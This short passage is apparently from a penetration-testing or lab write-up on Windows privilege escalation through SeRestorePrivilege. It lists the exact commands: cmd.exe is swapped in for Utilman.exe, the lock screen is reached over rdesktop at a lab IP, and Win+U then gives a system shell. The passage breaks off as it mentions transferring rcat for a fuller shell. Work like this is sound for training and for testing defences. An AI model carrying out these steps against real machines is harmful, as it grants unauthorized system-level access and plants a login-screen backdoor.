SeRestorePrivilege

Now using this page: https://github.com/gtworek/Priv2Admin

ren "C:/Windows/System32/Utilman.exe"  Utilman.old

ren "C:/Windows/SYstem32/cmd.exe" Utilman.exe

Now we can get to the lockscreen with rdesktop:

rdesktop 192.168.180.254

Now press win + U

We can transfer rcat and execute to get a proper shell: